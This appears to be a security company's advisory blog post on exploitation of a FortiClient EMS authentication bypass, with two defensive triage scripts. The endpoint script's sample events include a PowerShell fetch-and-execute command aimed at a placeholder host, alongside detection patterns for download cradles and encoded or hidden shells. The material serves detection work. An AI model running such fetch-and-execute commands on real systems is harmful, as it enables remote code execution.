Fortinet EMS Under Attack: What Businesses Need to Know
Christopher Souza | CEO
Cybersecurity researchers have identified active exploitation of a critical vulnerability affecting Fortinet FortiClient Endpoint Management Server (EMS). The vulnerability, tracked as CVE-2026-35616, is being leveraged by threat actors to gain unauthorized administrative access to FortiClient EMS environments and distribute credential-stealing malware to managed endpoints. Our partners at Arctic Wolf recently reported attacks where threat actors abused trusted endpoint management infrastructure to deploy a newly identified malware family known as EKZ Infostealer.
Rather than targeting individual workstations, attackers are seeking access to centralized management platforms that can be used to distribute malicious code across an organization’s entire device fleet. In this case, FortiClient EMS became the delivery mechanism for malware that appeared to be a legitimate Fortinet software update.
What Is CVE-2026-35616?
CVE-2026-35616 is a critical vulnerability in FortiClient EMS with a CVSS score of 9.1. The flaw stems from improper access controls that allow unauthenticated attackers to bypass API authentication mechanisms and perform privileged administrative actions. Fortinet has confirmed that the vulnerability is being actively exploited in the wild and has released emergency hotfixes and subsequent product updates to address it.
Once attackers gain access to a vulnerable EMS server, they can modify configurations and leverage the platform’s legitimate management capabilities to execute commands on managed endpoints. This effectively transforms a centralized security management tool into a large-scale malware deployment platform.
Key Notes About the Active Threat
- Attackers are actively exploiting CVE-2026-35616 against vulnerable FortiClient EMS deployments.
- The vulnerability allows threat actors to bypass authentication and gain privileged access to EMS management functions.
- Compromised EMS servers have been used to distribute malware disguised as a legitimate Fortinet software update.
- The attack leverages FortiClient’s own endpoint management and scripting functionality to execute malicious commands on managed devices.
- A single compromised EMS server can potentially expose every endpoint managed by that server.
- Fortinet has released security updates and hotfixes that address the vulnerability.
- The vulnerability has been added to CISA’s Known Exploited Vulnerabilities catalog due to active exploitation activity.
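The notes above describe the delivery path: the management platform's own scripting capability launches commands on managed endpoints, so the most direct endpoint-side signal is a scripting shell whose parent is the management agent. The following triage script is an added example and is not Fortinet's code or tooling. The event schema, the agent process name `mgmt_agent.exe`, and the sample events are all constructed for illustration; substitute the agent's real service binary and your own process-creation telemetry (Sysmon event 1 or Windows 4688 both carry the needed fields).

```python
"""Triage process-creation events for scripting shells launched by an
endpoint-management agent (added example; schema and names are assumptions)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Placeholder for the endpoint-management agent's service binary
# (assumption for this example; replace with the agent seen in your fleet).
AGENT_PARENTS = {"mgmt_agent.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Command-line traits that commonly accompany scripted payload delivery.
# Dict order determines the order reasons are reported in.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)\s-(enc|encodedcommand|e)\s"),
    "download_cradle": re.compile(
        r"(?i)(downloadstring|downloadfile|invoke-webrequest|iwr\s|start-bitstransfer)"),
    "invoke_expression": re.compile(r"(?i)(\biex\b|invoke-expression)"),
    "policy_bypass": re.compile(r"(?i)-e(x|p|xecutionpolicy)\s+bypass"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
}


@dataclass
class ProcessEvent:
    host: str
    image: str          # basename of the created process
    parent_image: str   # basename of the parent process
    command_line: str
    user: str


@dataclass
class Finding:
    host: str
    severity: str
    reasons: List[str]


def triage(event: ProcessEvent) -> Optional[Finding]:
    """Flag a shell spawned by the management agent (any arguments), and a
    shell anywhere whose command line carries payload-delivery indicators.
    Both together is rated high; either alone is rated medium."""
    image = event.image.lower()
    parent = event.parent_image.lower()
    if image not in SHELLS:
        return None
    reasons = [name for name, rx in INDICATORS.items() if rx.search(event.command_line)]
    has_indicators = bool(reasons)
    from_agent = parent in AGENT_PARENTS
    if from_agent:
        reasons.insert(0, f"shell spawned by management agent {parent}")
    if not reasons:
        return None
    severity = "high" if from_agent and has_indicators else "medium"
    return Finding(event.host, severity, reasons)


def triage_all(events: List[ProcessEvent]) -> List[Finding]:
    return [f for f in (triage(e) for e in events) if f is not None]


# Constructed sample telemetry (not captured from a real incident).
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "powershell.exe", "mgmt_agent.exe",
                 "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAuAC4ALgA=", "SYSTEM"),
    ProcessEvent("ws02", "powershell.exe", "mgmt_agent.exe",
                 "powershell.exe -File C:\\Scripts\\inventory.ps1", "SYSTEM"),
    ProcessEvent("ws03", "powershell.exe", "explorer.exe",
                 "powershell.exe -NoProfile -Command \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://updates.example.invalid/update.ps1')\"", "alice"),
    ProcessEvent("ws04", "notepad.exe", "explorer.exe", "notepad.exe notes.txt", "alice"),
    ProcessEvent("ws05", "powershell.exe", "cmd.exe", "powershell.exe Get-Process", "bob"),
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"{f.host} [{f.severity}] " + "; ".join(f.reasons))
```

The agent-spawned `inventory.ps1` on `ws02` is reported at medium severity on purpose: a legitimately published script looks identical at the process-lineage level, so the finding is a prompt to reconcile the script against the entries an administrator actually published on the EMS server, not a verdict on its own.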
Recommended Actions for Organizations
Organizations using FortiClient EMS should treat this threat as a high-priority security concern and take these immediate steps to assess their exposure:
- Verify whether FortiClient EMS is deployed within your environment.
- Confirm all available Fortinet security updates and hotfixes have been applied.
- Review EMS configuration changes for unauthorized modifications.
- Investigate endpoint activity for suspicious software deployments or PowerShell execution.
- Audit VPN and endpoint management scripts for unexpected entries.
- Monitor authentication logs and management activity for signs of compromise.
- Consider rotating credentials and invalidating active sessions if compromise is suspected.
- Review browser-stored credentials and evaluate whether sensitive accounts may have been exposed.
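The review steps above (configuration changes, script entries, authentication logs) reduce to one correlation question on the server side: was every privileged change preceded by an authenticated session from the same source, and was the actor a known administrator? The script below is an added example, not Fortinet's code, and it assumes a simple `timestamp key=value ...` audit-line format constructed for illustration; the real EMS log format differs, so the `parse` function is the part to adapt. The action names, the eight-hour session window and the sample log are also assumptions.

```python
"""Correlate privileged management-server actions with authenticated sessions
(added example; log format, action names and sample data are constructed)."""
import re
from datetime import datetime, timedelta
from typing import Dict, List, Set

# Actions that change what the server pushes to endpoints or who may manage it
# (assumed names; map to the equivalent events in your server's audit log).
PRIVILEGED = {"script.create", "script.deploy", "config.update", "admin.create"}
# Assumed maximum age of a login that may still explain a later admin action.
SESSION_WINDOW = timedelta(hours=8)
KV = re.compile(r"(\w+)=(\S+)")


def parse(line: str) -> Dict[str, object]:
    """Parse '2026-04-02T08:00:00Z src=... user=... action=...' into a dict."""
    ts, _, rest = line.strip().partition(" ")
    rec: Dict[str, object] = dict(KV.findall(rest))
    rec["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return rec


def review(lines: List[str], known_admins: Set[str]) -> List[Dict[str, object]]:
    """Return privileged actions that lack a recent successful login from the
    same source, or whose actor is not a known administrator (or both)."""
    logins: Dict[str, datetime] = {}   # source address -> last successful login
    findings = []
    for rec in (parse(l) for l in lines if l.strip()):
        if rec["action"] == "login" and rec.get("result") == "success":
            logins[rec["src"]] = rec["ts"]
            continue
        if rec["action"] not in PRIVILEGED:
            continue
        reasons = []
        last = logins.get(rec["src"])
        if last is None or rec["ts"] - last > SESSION_WINDOW:
            reasons.append("privileged action with no authenticated session from this source")
        actor = rec.get("user", "-")
        if actor not in known_admins:
            reasons.append(f"actor {actor} is not a known administrator")
        if reasons:
            findings.append({"ts": rec["ts"].isoformat(), "src": rec["src"],
                             "action": rec["action"], "reasons": reasons})
    return findings


# Constructed sample audit log (not real EMS output).
SAMPLE_LOG = [
    "2026-04-02T08:00:00Z src=10.0.5.21 user=jsmith action=login result=success",
    "2026-04-02T08:03:10Z src=10.0.5.21 user=jsmith action=config.update target=vpn_profile",
    "2026-04-02T11:42:55Z src=203.0.113.44 user=- action=script.create name=client_update",
    "2026-04-02T11:43:20Z src=203.0.113.44 user=- action=script.deploy name=client_update scope=all",
    "2026-04-02T12:10:05Z src=10.0.5.40 user=tmp_admin action=login result=failure",
    "2026-04-02T12:10:30Z src=10.0.5.40 user=tmp_admin action=admin.create target=tmp_admin2",
]
KNOWN_ADMINS = {"jsmith"}

if __name__ == "__main__":
    for f in review(SAMPLE_LOG, KNOWN_ADMINS):
        print(f"{f['ts']} {f['src']} {f['action']}: " + "; ".join(f["reasons"]))
```

The session check is what an authentication bypass looks like from the log's point of view: the privileged call arrives with no login behind it. The administrator check catches the follow-on case of an account created or reused outside the approved list, which is why the guidance pairs configuration review with credential rotation.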
TSI Can Help! Contact Us Today
As threat actors continue to target centralized management platforms and trusted administrative tools, vulnerability management and proactive monitoring remain critical components of an effective cybersecurity strategy.
TSI is actively monitoring developments related to CVE-2026-35616 and assisting organizations with vulnerability assessments, security reviews, patch management, and threat detection activities. If your organization uses Fortinet technologies and would like assistance evaluating its exposure to this vulnerability, contact us today and schedule a security review. Our team of experts helps assess your environment, validate your cybersecurity posture, and provide guidance to reduce risk from this issue along with other emerging threats.
About Technical Support International
TSI is a 37-year-old cybersecurity (MSSP) and IT support (MSP) company specializing in helping DIB organizations address their NIST 800-171 and CMMC compliance obligations. As a CMMC-AB Registered Provider Organization (RPO), TSI offers a complete NIST 800-171 and CMMC support solution to help guide our clients toward a successful certification audit and provide the assurance that they are adhering to these expansive compliance requirements.